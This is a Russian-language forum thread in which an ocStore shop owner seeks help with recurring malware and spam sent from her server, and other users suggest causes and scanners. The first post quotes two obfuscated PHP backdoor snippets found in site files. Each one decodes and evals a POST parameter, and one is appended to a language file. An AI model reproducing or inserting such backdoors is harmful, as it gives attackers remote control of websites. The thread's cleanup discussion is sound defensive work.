Каждый день вредоносный код(((

[hitball]

Здравствуйте, уважаемая поддержка!

Регулярно на сайте появляется вредоносный код, хостеру жалуются на рассылку спама с нашего сервера. Количество писем доходит до 20000, постепенно они превращаются в мертвые.

Код такого плана добавляется в файлы сайта, но многие файлы он создает сам!

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na82bec'])) {eval($s21(${$s20}['na82bec']));}?>

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n538c51'])) {eval($s21(${$s20}['n538c51']));}?><?php
// Heading
$_['heading_title'] = 'Приветствие';
?>

Файлы и код появляются хаотично по всему сайту. К примеру сегодня удалила из папок image, vqmod, system, catalog примерно 30 кусков этого кода.

 

 

Магазин ocStore Version 1.5.4.1

Очень много стоит модулей. 

Помогите понять в чем проблема, пока нас не попросили с хостинга(((

[Tom]

Первая и основная причина,здравствуй варез и с ним все вирусы...

Вторая менее вероятная,наличие по соседству  WP или Joomla.

[hitball]

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

[xds]

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

:-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез

https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7

[hitball]

это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться?

[Гість]

не факт. Ваши файлы системные уже скорее всего заражены.

Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/

[pashast]

Этим пройдитесь http://revisium.com/ai/ , обычно все находит.

[hitball]

pashast, сейчас проверяю virusdie это ведь по сути то же самое?

timedontwait, спасибо, сейчас сравню.

[Гість]

Да поддерживаю aibolit используйте. Толковая утилита

[hitball]

не вышло у меня запустить айболит с сервера к сожалению( 

ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13?

может по этим словам поискать?

[Tom]

Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках.

[hitball]

Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили",  а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен(

[Tom]

Тогда как по мне ,выход у вас один.Собрать магазин  из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву).

Папку с картинками слейте и прогоните на компе  анти-вирусником.Останется только  вставить конфиги и проверенную  папку с картинками  и заменить нынешнего больного,на просветлённого нового))))

[hitball]

Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались(

[chukcha]

Айболит не лечит, айболит -  экспресс диагностика.

 

Лечат другие средства...

[hitball]

chukcha, с радостью выслушаю ваше предложение по лечению сайта

[destreser]

Испытайте в боевых условиях http://yandex.ru/promo/manul#about

[hitball]

destreser, о пасибки!!!

[hitball]

destreser, странный этот антивирус. Ругается на кучу здоровых файлов  :ugeek: 

[destreser]

Значит вручную перебирайте каждый файл.

[hitball]

destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы!

[destreser]

Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым?

[hitball]

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

[agropuls]

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

[halfhope]

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

 

Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514